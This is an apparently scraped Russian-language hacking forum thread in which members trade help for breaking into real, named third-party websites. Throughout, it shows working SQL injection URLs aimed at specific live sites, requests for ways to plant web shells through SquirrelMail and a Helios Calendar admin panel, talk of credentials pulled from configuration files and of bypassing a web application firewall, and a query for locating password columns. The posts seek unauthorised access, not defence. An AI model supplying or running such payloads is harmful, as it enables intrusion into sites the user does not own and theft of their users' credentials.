Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Code:
    http://ironmiketyson.ru/article_read.php?id=(0)union(select(1),2,3,(select(table_name)from(information_schema.columns)limit+1))--+
    Иногда, достаточно просто подумать.
     
    _________________________
  2. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    Такой вопрос...
    Вообщем Есть скуль и есть возможность четения файлов File_Priv = Y
    На самом сайте не могу найти директорию для что бы залить файл... там же есть
    SquirrelMail version 1.4.15
    Нашол директорию где он лежит...
    Подскажите мб кто знает какие папки в этом SquirrelMail есть что бы в них залить шелл?
     
  3. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Заливай в /tmp и ищи инклюд.
     
    1 person likes this.
  4. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    нет инклуда = \
    На сайте есть phpmyadmin, Логины и пассы к бд повыдирал из конфигов... но на pma стоит вебавторизация, логины и пассы от бд не подходят = \ .htaccess, .htpasswd в директории пма нет или же я не могу прочитать их там) хотя визде htacces читается!
     
    #17304 GroM88, 9 Jul 2011
    Last edited: 9 Jul 2011
  5. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    а поискать конфиг не?

    https://forum.antichat.ru/thread49775.html
     
    _________________________
  6. sam367

    sam367 New Member

    Joined:
    18 Sep 2005
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Помогите разобраться с уязвимостью

    http://moon-land.ru/index.php?f=news&page=http://www.google.fr/webhp%3f%3Cbalisexss%3E%22%27
    нашел уязвимость, не могу ее заюзать, помогите.
     
  7. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Инъекция есть, но раскрутить не удастся.
     
  8. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Там нет уязвимости
     
    _________________________
  9. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    Ты бы мне шептанул какой конфиг искать?)
    P.S. Этим топиком постоянно пользуюсь )
     
  10. Sloneny

    Sloneny New Member

    Joined:
    8 Mar 2010
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Вопрос про способ заливки шелла:)
    Есть вот такой тип админки, http://www.whatshappening.sg/admin

    В ТЕМЕ НЕЛЬЗЯ ПОСТИТЬ ЛОГИНЫ И ПАРОЛИ ВО ИЗБЕЖАНИЕ ДЕФЕЙСОВ

    прошу прощения,
    тогда вот ссылка на продукт(календарь Helios Calendar )
    http://www.refreshmy.com/documentation/?title=Helios
    может кто сталкивался с таким?

    Как ни старался, не могу придумать как залить туда шелл:(
    Требуется помощь.
     
    #17310 Sloneny, 11 Jul 2011
    Last edited: 11 Jul 2011
  11. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    помогите заюзать скулю, чет у меня не пляшет ниче
    http://www.czechstreets.com/?p=tour&start=5'
     
  12. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Заюзать скулю, не удастся
     
  13. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    почему??
    там в конец кода каким то чудесним образом попадает 7, как ее убрать??
     
  14. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Там нет уязвимости, переменная start попадает в значение LIMIT, а LIMIT в свою очередь стоит после ORDER BY. В таком варианте провести инъекцию не возможно.
     
    _________________________
  15. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    http://urban-alumni.asci.org.in/news-details.php?id=16+union+select+1,2,3,5,6--

    Есть че для обхода WAF?
     
  16. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    прогнался ручками не че не получается, запустил в хэвиджь определил как блинд и подобрал БД, дальше не стал крутить...

    P.S.: DB: fullhyd_ascicug
     
    _________________________
    #17316 winstrool, 13 Jul 2011
    Last edited: 13 Jul 2011
  17. Sc0rpi0n

    Sc0rpi0n Banned

    Joined:
    23 Feb 2010
    Messages:
    75
    Likes Received:
    22
    Reputations:
    16
    Такая ситуация. если оч много таблиц в бд. а мне надо вывести таблицы типа users, passwords. они могу похоже называтся. я забыл как там при помощи LIKE вывести таблицу название похожее например на passwords
     
  18. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    PHP:
    SELECT column_name FROM information_schema.columns WHERE column_name LIKE '%pas%'
     
    _________________________
    1 person likes this.
  19. expupkin

    expupkin New Member

    Joined:
    15 Jan 2010
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Часто натыкабсь на такие ошибки , скажите есть тут уязвимость или нет ? И если есть то как её использовать ?

    HTML:
    http://engineer.asu.edu/feed-item?page=7
     
  20. erolom

    erolom New Member

    Joined:
    14 Mar 2009
    Messages:
    0
    Likes Received:
    4
    Reputations:
    1
    скуля, раскрытие путей
     
Thread Status:
Not open for further replies.